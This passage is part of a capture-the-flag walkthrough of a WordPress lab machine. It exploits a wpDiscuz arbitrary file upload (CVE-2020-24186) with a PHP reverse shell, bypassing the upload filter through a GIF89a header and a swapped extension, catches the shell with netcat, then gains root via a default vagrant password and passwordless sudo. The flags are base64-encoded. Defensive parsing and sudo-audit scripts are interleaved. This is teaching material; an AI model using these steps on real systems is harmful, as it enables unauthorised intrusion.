 |      - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
 |      - https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz
 |
 | [!] Title: Comments - wpDiscuz < 7.3.2 - Admin+ Stored Cross-Site Scripting
 |     Fixed in: 7.3.2
 |     References:
 |      - https://wpscan.com/vulnerability/f51a350c-c46d-4d52-b787-762283625d0b
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24737
 |
 | [!] Title: wpDiscuz < 7.3.4 - Arbitrary Comment Addition/Edition/Deletion via CSRF
 |     Fixed in: 7.3.4
 |     References:
 |      - https://wpscan.com/vulnerability/2746101e-e993-42b9-bd6f-dfd5544fa3fe
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24806
 |      - https://www.youtube.com/watch?v=CL7Bttu2W-o
 |
 | [!] Title: wpDiscuz < 7.3.12 - Sensitive Information Disclosure
 |     Fixed in: 7.3.12
 |     References:
 |      - https://wpscan.com/vulnerability/027e6ef8-39d8-4fa9-957f-f53ee7175c0a
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23984
 |
 | [!] Title: wpDiscuz < 7.6.4 - Unauthenticated Data Modification via IDOR
 |     Fixed in: 7.6.4
 |     References:
 |      - https://wpscan.com/vulnerability/d7de195a-a932-43dd-bbb4-784a19324b04
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3869
 |
 | [!] Title: wpDiscuz < 7.6.4 - Post Rating Increase/Decrease iva IDOR
 |     Fixed in: 7.6.4
 |     References:
 |      - https://wpscan.com/vulnerability/051ab8b8-210e-48ac-82e7-7c4a0aa2ecd5
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3998
 |
 | [!] Title: wpDiscuz < 7.6.12 - Unauthenticated Stored XSS
 |     Fixed in: 7.6.12
 |     References:
 |      - https://wpscan.com/vulnerability/f061ffa4-25f2-4ad5-9edb-6cb2c7b678d1
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47185
 |
 | [!] Title: wpDiscuz < 7.6.6 - Unauthenticated SQL Injection
 |     Fixed in: 7.6.6
 |     Reference: https://wpscan.com/vulnerability/ebb5ed9a-4fb2-4d64-a8f2-6957878a4599
 |
 | [!] Title: wpDiscuz < 7.6.4 - Author+ IDOR
 |     Fixed in: 7.6.4
 |     References:
 |      - https://wpscan.com/vulnerability/d5e677ef-786f-4921-97d9-cbf0c2e21df9
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46311
 |
 | [!] Title: wpDiscuz < 7.6.11 - Unauthenticated Content Injection
 |     Fixed in: 7.6.11
 |     References:
 |      - https://wpscan.com/vulnerability/8c8cabee-285a-408f-9449-7bb545c07cdc
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46310
 |
 | [!] Title: wpDiscuz < 7.6.11 - Insufficient Authorization to Comment Submission on Deleted Posts
 |     Fixed in: 7.6.11
 |     References:
 |      - https://wpscan.com/vulnerability/874679f2-bf44-4c11-bc3b-69ae5ac59ced
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46309
 |
 | [!] Title: wpDiscuz < 7.6.12 - Missing Authorization in AJAX Actions
 |     Fixed in: 7.6.12
 |     References:
 |      - https://wpscan.com/vulnerability/2e121d4f-7fdf-428c-8251-a586cbd31a96
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45760
 |
 | [!] Title: wpDiscuz < 7.6.12 - Cross-Site Request Forgery
 |     Fixed in: 7.6.12
 |     References:
 |      - https://wpscan.com/vulnerability/f8dfcc13-187c-4a83-a87e-761c0db4b6d9
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47775
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/53af9dfd-eb2d-4f6f-b02f-daf790b95f1f
 |
 | [!] Title: wpDiscuz < 7.6.6 - Unauthenticated SQL Injection
 |     Fixed in: 7.6.6
 |     References:
 |      - https://wpscan.com/vulnerability/a2fec175-40f6-4a80-84ed-5b88251584de
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/9dd1e52c-83b7-4b3e-a791-a2c0ccd856bc
 |
 | [!] Title: wpDiscuz < 7.6.13 - Admin+ Stored XSS
 |     Fixed in: 7.6.13
 |     References:
 |      - https://wpscan.com/vulnerability/79aed6a7-a6e2-4429-8f98-ccac6b59fb4d
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51691
 |      - https://patchstack.com/database/vulnerability/wpdiscuz/wordpress-wpdiscuz-plugin-7-6-12-cross-site-scripting-xss-vulnerability
 |
 | [!] Title: wpDiscuz < 7.6.16 - Authenticated (Author+) Stored Cross-Site Scripting via Uploaded Image Alternative Text
 |     Fixed in: 7.6.16
 |     References:
 |      - https://wpscan.com/vulnerability/f3a337ae-54e5-41ca-a0d9-60745b568469
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2477
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/3eddc03d-ecff-4b50-a574-7b6b62e53af0
 |
 | Version: 7.0.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.95.10/assets/fonts/blog/wp-content/plugins/wpdiscuz/readme.txt

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 3
 | Requests Remaining: 22

[+] Finished: Thu May  9 23:33:35 2024
[+] Requests Done: 105396
[+] Cached Requests: 8
[+] Data Sent: 31.711 MB
[+] Data Received: 14.286 MB
[+] Memory used: 425.133 MB
[+] Elapsed time: 00:11:15
                                                                                                                               
┌──(kali㉿kali)-[~]
└─$  

In the results, WPScan identified 16 vulnerabilities in the detected plugins, none of which our previous scan had picked up.

By exploiting one of these vulnerabilities, we can gain a foothold on the vulnerable server.
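As an added example (not part of the original walkthrough or of WPScan), here is a small Python triage script for reports like the one above: it parses the plugin blocks, extracts each plugin's detected version and its vulnerability list with CVE ids, and keeps only the entries whose "Fixed in" version is newer than the detected one. The report excerpt inside it is constructed and abridged from the scan output above, and the third wpDiscuz entry is a placeholder added so the filter has something to drop.

```python
"""Triage a WPScan text report: pull out each plugin, its detected version and its
listed vulnerabilities, then keep only entries whose 'Fixed in' version is newer."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed, abridged excerpt in the layout of the report above.  The third
# wpDiscuz entry is a placeholder added so the filter has something to drop.
SAMPLE_REPORT = """\
[+] akismet
 | [!] The version is out of date, the latest version is 5.3.2
 |
 | Version: 4.0.8 (100% confidence)

[+] wpdiscuz
 | [!] Title: Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload
 |     Fixed in: 7.0.5
 |     References:
 |      - https://wpscan.com/vulnerability/92ae2765-dac8-49dc-a361-99c799573e61
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24186
 |
 | [!] Title: wpDiscuz < 7.6.4 - Unauthenticated Data Modification via IDOR
 |     Fixed in: 7.6.4
 |     References:
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3869
 |
 | [!] Title: PLACEHOLDER - wpDiscuz < 7.0.1 - Issue Fixed Before This Build
 |     Fixed in: 7.0.1
 |
 | Version: 7.0.4 (80% confidence)
"""

PLUGIN_RE = re.compile(r"^\[\+\] (\S+)$")     # "[+] wpdiscuz" opens a plugin block
TITLE_RE = re.compile(r"^\[!\] Title: (.+)$")
FIXED_RE = re.compile(r"^Fixed in: (\S+)$")
VERSION_RE = re.compile(r"^Version: (\S+)")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


@dataclass
class Vuln:
    title: str
    fixed_in: Optional[str] = None            # None when WPScan lists no fix
    cves: List[str] = field(default_factory=list)


@dataclass
class Plugin:
    name: str
    version: Optional[str] = None
    vulns: List[Vuln] = field(default_factory=list)


def parse_version(text: str) -> tuple:
    """'7.0.4' -> (7, 0, 4); a non-numeric piece such as 'rc1' counts as 0."""
    return tuple(int(m.group()) if (m := re.match(r"\d+", p)) else 0 for p in text.split("."))


def version_lt(a: str, b: str) -> bool:
    """True when a < b, zero-padded so that 7.0 and 7.0.0 compare equal."""
    ta, tb = parse_version(a), parse_version(b)
    width = max(len(ta), len(tb))
    return ta + (0,) * (width - len(ta)) < tb + (0,) * (width - len(tb))


def parse_report(text: str) -> List[Plugin]:
    plugins: List[Plugin] = []
    plugin = vuln = None
    for raw in text.splitlines():
        if header := PLUGIN_RE.match(raw):        # a new "[+] name" block starts
            plugin = Plugin(header.group(1))
            plugins.append(plugin)
            vuln = None
            continue
        line = raw.lstrip(" |").strip()           # drop the " |    " gutter WPScan draws
        if plugin is None or not line:
            continue
        if m := TITLE_RE.match(line):
            vuln = Vuln(m.group(1).strip())
            plugin.vulns.append(vuln)
        elif m := VERSION_RE.match(line):
            plugin.version = m.group(1)
        elif vuln is not None:                    # body lines of the current entry
            if m := FIXED_RE.match(line):
                vuln.fixed_in = m.group(1)
            else:
                vuln.cves += [c for c in CVE_RE.findall(line) if c not in vuln.cves]
    return plugins


def applicable(plugin: Plugin) -> List[Vuln]:
    """Vulnerabilities still affecting the detected version; an unknown version
    or a missing 'Fixed in' counts as affected, the conservative choice."""
    return [v for v in plugin.vulns if plugin.version is None
            or v.fixed_in is None or version_lt(plugin.version, v.fixed_in)]
```

Running `parse_report` on a full report and printing `applicable(p)` per plugin gives a patch list ordered by what actually affects the installed build.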


Foothold

To establish a foothold, I'll focus solely on exploiting the "Unauthenticated Arbitrary File Upload" vulnerability.

 | [!] Title: Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload
 |     Fixed in: 7.0.5
 |     References:
 |      - https://wpscan.com/vulnerability/92ae2765-dac8-49dc-a361-99c799573e61
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24186
 |      - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
 |      - https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz

Exploiting this flaw in a WordPress plugin entails using it to upload a malicious file, typically a web shell or a reverse shell, to the target server.

To learn more about file upload vulnerabilities, see the guide File Upload Vulnerabilities, which covers the security risks of file upload functionality in web applications and best practices for mitigating them.


Exploitation: Gaining Reverse Shell via Unauthenticated Arbitrary File Upload Exploit

To upload the malicious file, we need to identify an area where uploads are possible. On a blog, the comment section is the usual place to find one.

Let's check one of the posts.

Upon clicking on a post, I encountered an error message stating "Having trouble finding that site."


Resolving 'Having Trouble Finding That Site' Issue by Adding Host Address

This issue arises because the browser cannot resolve the "blogger.htm" domain to the target's IP address. Therefore, we need to add this host to our hosts file.

To do this, open the hosts file located in the "/etc" directory using the Nano text editor.

┌──(kali㉿kali)-[~]
└─$ sudo nano /etc/hosts
[sudo] password for kali: 

Add the host entry to the file, mapping the target's IP address to the domain name.

Save it by pressing CTRL + X and confirm with "yes".

Afterward, refresh the webpage. 

When you navigate to the blog, you'll notice a comment section at the bottom. 

Within this section, you'll find a file upload option in the right-hand corner.


Obtaining a Shell via PHP Reverse Shell Upload

First, locate the php-reverse-shell file. 

┌──(kali㉿kali)-[~]
└─$ locate php reverse shell
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php
                                                                                                                               
┌──(kali㉿kali)-[~]
└─$

Let's copy this file to the Kali home directory.

┌──(kali㉿kali)-[~]
└─$ cp /usr/share/webshells/php/php-reverse-shell.php .    
                                                                                                                               
┌──(kali㉿kali)-[~]
└─$ ls                      
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos  php-reverse-shell.php
                                                                                                                               
┌──(kali㉿kali)-[~]
└─$

Before uploading the shell, we need to make one adjustment: replace the IP address in the shell with our host-only adapter's IP address, so the callback reaches our Kali machine.

┌──(kali㉿kali)-[~]
└─$ nano php-reverse-shell.php 

Additionally, since uploads may be restricted to image files, let's rename the file extension from ".php" to ".png."

┌──(kali㉿kali)-[~]
└─$ mv php-reverse-shell.php shell.png
                                                                                                                               
┌──(kali㉿kali)-[~]
└─$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos  shell.png

Even with the ".png" extension, the upload is still detected as a PHP file, so the check evidently inspects the file's contents rather than just its name. To get past it, we add the GIF signature "GIF89a;" at the very start of the reverse shell file.

┌──(kali㉿kali)-[~]
└─$ nano shell.png  

This signature makes the file look like a GIF image to the upload check, which only accepts image files.

For more detailed guidance, consider watching a video tutorial on exploiting File Upload vulnerabilities. This will provide a clearer understanding of the process.

When uploading shell.png, we need to manipulate the request so that the shell actually gets executed. Using Burp Suite, we intercept the request that posts the comment.

For background on the tool, see the guide Burp Suite: Web Crawler, Scanner, Proxy, which covers its crawler, scanner and proxy features and how to use them for vulnerability assessment and penetration testing.

However, before that, we need to start a listener using Netcat.

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...


Intercept the request (post comment) in Burp Suite

Now, let's start by launching Burp Suite.

Access the proxy tab and activate intercept mode to capture target requests. 

Configure your browser's proxy settings using FoxyProxy: switch the proxy to Burp Suite within the FoxyProxy extension.

Upon uploading the file, Burp Suite intercepts the request. Let's change the filename's ".png" extension back to ".php" and click "Forward", so the reverse shell file is stored as PHP and executes once uploaded. 

By forwarding the altered intercepted data in Burp Suite, we successfully established a shell connection.

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.95.3] from (UNKNOWN) [192.168.95.10] 44474
Linux ubuntu-xenial 4.4.0-206-generic #238-Ubuntu SMP Tue Mar 16 07:52:37 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 18:21:32 up  1:20,  0 users,  load average: 0.03, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Next, let's check the user's identity on the target system. 

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

Upon investigation, I discovered that we are running as www-data (uid 33), with the group the same. This is a low-privileged web server account, not the access we're after. 

To spawn a proper interactive shell, I first need to determine which version of Python is installed. 

$ which python
$ which python3
/usr/bin/python3
$

It turns out that Python3 is available. I'll use it to spawn a TTY shell, and additionally export TERM=xterm so the terminal behaves properly. 

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu-xenial:/$ export TERM=xterm
export TERM=xterm
www-data@ubuntu-xenial:/$

Now, let's locate the user flag, typically found in the user directory. In every Linux system, there is a home directory containing user directories.

www-data@ubuntu-xenial:/$ cd /home
cd /home
www-data@ubuntu-xenial:/home$ ls
ls
james  ubuntu  vagrant
www-data@ubuntu-xenial:/home$

Upon inspection, three directories are present: james, ubuntu, and vagrant. I suspect the user flag may be located in the "james" directory.

www-data@ubuntu-xenial:/home$ cd james  
cd james
www-data@ubuntu-xenial:/home/james$ ls -al
ls -al
total 24
drwxr-xr-x 2 james james 4096 Jan 17  2021 .
drwxr-xr-x 5 root  root  4096 Jan 17  2021 ..
-rw-r--r-- 1 james james  220 Jan 17  2021 .bash_logout
-rw-r--r-- 1 james james 3771 Jan 17  2021 .bashrc
-rw-r--r-- 1 james james  655 Jan 17  2021 .profile
-rw------- 1 james james   29 Apr  2  2021 user.txt
www-data@ubuntu-xenial:/home/james$

Let's attempt to open it using the "cat" command. 

www-data@ubuntu-xenial:/home/james$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@ubuntu-xenial:/home/james$

However, upon accessing it, we encounter a "permission denied" error. Fortunately, there is another user that may help us read the user flag. 

www-data@ubuntu-xenial:/home/james$ cd ..
cd ..
www-data@ubuntu-xenial:/home$ ls -al
ls -al
total 20
drwxr-xr-x  5 root    root    4096 Jan 17  2021 .
drwxr-xr-x 25 root    root    4096 May  9 17:00 ..
drwxr-xr-x  2 james   james   4096 Jan 17  2021 james
drwxr-xr-x  3 ubuntu  ubuntu  4096 Jan 17  2021 ubuntu
drwxr-xr-x  4 vagrant vagrant 4096 Jan 17  2021 vagrant
www-data@ubuntu-xenial:/home$ 

Let's switch to the "vagrant" user.

www-data@ubuntu-xenial:/home$ su vagrant
su vagrant
Password:

Upon switching the user, it prompts us for a password. A quick search tells us that "Vagrant is a tool for creating and managing virtual development environments." Typically, the default username and password for a Vagrant virtual machine are both "vagrant".  


Let's input the default password and see if it grants us access.

www-data@ubuntu-xenial:/home$ su vagrant
su vagrant
Password: vagrant  

vagrant@ubuntu-xenial:/home$ whoami 
whoami
vagrant
vagrant@ubuntu-xenial:/home$

Success! With the default password, we can now try to read the user flag using the "cat" command. 

vagrant@ubuntu-xenial:/home$  cat /james/user.txt
cat /james/user.txt
cat: user.txt: Permission denied

However, it appears the "vagrant" user also does not have permission to read the user.txt file. 

Let's check this user's privileges to find a way to the user flag, and then escalate privileges to obtain the root flag and complete the task.


Privilege Escalation

During the privilege escalation process, our main objective is to gather system information and identify any potential vulnerabilities or misconfigurations that could grant us higher privileges, ultimately allowing access to the root level.

To begin, let's enumerate the user's permissions to assess the rights and privileges this account has on the system. Useful commands here are "sudo -l", which lists the commands the current user may run with elevated privileges, and "uname -a", which reports the kernel and OS version.

vagrant@ubuntu-xenial:/home$ sudo -l
sudo -l
Matching Defaults entries for vagrant on ubuntu-xenial:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User vagrant may run the following commands on ubuntu-xenial:
    (ALL) NOPASSWD: ALL
vagrant@ubuntu-xenial:/home$

After running the "sudo -l" command, I discovered that the "vagrant" user may run any command as any user via sudo, and no password is required (NOPASSWD: ALL).
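For anyone auditing a box rather than attacking it, this "sudo -l" output is the finding to look for. The Python below is an added example, not part of the walkthrough: it parses "sudo -l" output (the output shown above, plus one constructed, narrowly scoped entry for comparison) and flags rules that grant passwordless or unrestricted sudo, which is exactly what lets "sudo su" succeed without a password.

```python
import re

# Constructed sample: the "sudo -l" output from the walkthrough, plus one tighter
# entry added to show what a narrowly scoped rule looks like by comparison.
SUDO_L_OUTPUT = """\
Matching Defaults entries for vagrant on ubuntu-xenial:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User vagrant may run the following commands on ubuntu-xenial:
    (ALL) NOPASSWD: ALL
    (root) /usr/bin/systemctl restart nginx
"""

# One privilege line: "(runas) TAG: TAG: command, command"
ENTRY = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text: str) -> list:
    """Return the privilege entries listed after the 'may run the following commands' line."""
    entries, in_cmds = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True          # Defaults lines before this point are not privileges
            continue
        m = ENTRY.match(line) if in_cmds else None
        if not m:
            continue
        tags = [t.strip() for t in m["tags"].split(":") if t.strip()]
        cmds = [c.strip() for c in m["cmds"].split(",") if c.strip()]
        entries.append({"runas": m["runas"].strip(), "tags": tags,
                        "cmds": cmds, "raw": line.strip()})
    return entries


def audit(text: str) -> list:
    """Rate each entry; NOPASSWD together with ALL is root for anyone holding the account.

    Remediation is to remove such rules and grant only the specific commands the account
    needs, keeping the password prompt unless there is a concrete reason to drop it.
    """
    findings = []
    for e in parse_sudo_l(text):
        if "ALL" in e["cmds"] and "NOPASSWD" in e["tags"]:
            findings.append(f"CRITICAL: passwordless sudo to any command: {e['raw']}")
        elif "ALL" in e["cmds"]:
            findings.append(f"HIGH: sudo to any command (password still required): {e['raw']}")
        elif "NOPASSWD" in e["tags"]:
            findings.append(f"MEDIUM: passwordless sudo to a command list: {e['raw']}")
    return findings
```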


Sudo Privilege Escalation

Now, let's run the " sudo su " command to confirm our assumption. 

vagrant@ubuntu-xenial:/home$ sudo su
sudo su
root@ubuntu-xenial:/home#

And voila! We are now root! Now, let's rerun the previous command to view the user flag. 

root@ubuntu-xenial:/home# cat james/user.txt
cat james/user.txt
ZmxhZ3tZMHVfRCFEXzE3IDopfQ==
root@ubuntu-xenial:/home#

Finally, we now have the user flag. 

Now, it's time to shift our focus to the root flag. Navigate to root's home directory, /root, and you'll find it there. 

root@ubuntu-xenial:/home# cd /root
cd /root
root@ubuntu-xenial:~# ls -al
ls -al
total 24
drwx------  3 root root 4096 Jan 17  2021 .
drwxr-xr-x 25 root root 4096 May  9 17:00 ..
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root  501 Apr  2  2021 root.txt
drwx------  2 root root 4096 Jan 17  2021 .ssh
root@ubuntu-xenial:~#

Here it is!

root@ubuntu-xenial:~# cat root.txt
cat root.txt
SGV5IFRoZXJlLApNeXNlbGYgR2F1cmF2IFJhaiwgSGFja2VyLCBQcm9ncmFtbWVyICYgRnJlZUxhbmNlci4KVGhpcyBpcyBteSBmaXJzdCBhdHRlbXB0IHRvIGNyZWF0ZSBhIHJvb20uIExldCBtZSBrbm93IGlmIHlvdSBsaWtlZCBpdC4KQW55IGlzc3VlIG9yIHN1Z2dlc3Rpb25zIGZvciBtZS4gUGluZyBtZSBhdCB0d2l0dGVyCgpUd2l0dGVyOiBAdGhlaGFja2Vyc2JyYWluCkdpdGh1YjogQHRoZWhhY2tlcnNicmFpbgpJbnN0YWdyYW06IEB0aGVoYWNrZXJzYnJhaW4KQmxvZzogaHR0cHM6Ly90aGVoYWNrZXJzYnJhaW4ucHl0aG9uYW55d2hlcmUuY29tCgoKSGVyZSdzIFlvdXIgRmxhZy4KZmxhZ3tXMzExX0QwbjNfWTB1X1AzbjN0cjR0M2RfTTMgOil9Cg==
root@ubuntu-xenial:~# 

I suspect both the user flag and root flag are encoded in base64 format. Let's decode them to reveal their contents.

┌──(kali㉿kali)-[~]
└─$ echo "ZmxhZ3tZMHVfRCFEXzE3IDopfQ==" | base64 -d
flag{Y0u_D!D_17 :)}
┌──(kali㉿kali)-[~]
└─$ echo "SGV5IFRoZXJlLApNeXNlbGYgR2F1cmF2IFJhaiwgSGFja2VyLCBQcm9ncmFtbWVyICYgRnJlZUxhbmNlci4KVGhpcyBpcyBteSBmaXJzdCBhdHRlbXB0IHRvIGNyZWF0ZSBhIHJvb20uIExldCBtZSBrbm93IGlmIHlvdSBsaWtlZCBpdC4KQW55IGlzc3VlIG9yIHN1Z2dlc3Rpb25zIGZvciBtZS4gUGluZyBtZSBhdCB0d2l0dGVyCgpUd2l0dGVyOiBAdGhlaGFja2Vyc2JyYWluCkdpdGh1YjogQHRoZWhhY2tlcnNicmFpbgpJbnN0YWdyYW06IEB0aGVoYWNrZXJzYnJhaW4KQmxvZzogaHR0cHM6Ly90aGVoYWNrZXJzYnJhaW4ucHl0aG9uYW55d2hlcmUuY29tCgoKSGVyZSdzIFlvdXIgRmxhZy4KZmxhZ3tXMzExX0QwbjNfWTB1X1AzbjN0cjR0M2RfTTMgOil9Cg==" | base64 -d
Hey There,
Myself Gaurav Raj, Hacker, Programmer & FreeLancer.
This is my first attempt to create a room. Let me know if you liked it.
Any issue or suggestions for me. Ping me at twitter

Twitter: @thehackersbrain
Github: @thehackersbrain
Instagram: @thehackersbrain
Blog: https://thehackersbrain.pythonanywhere.com


Here's Your Flag.
flag{W311_D0n3_Y0u_P3n3tr4t3d_M3 :)}
                                                                                                                               
┌──(kali㉿kali)-[~]
└─$ 

If you have any questions or concerns, don't hesitate to leave a comment below. I'm here to assist and address any inquiries you may have.
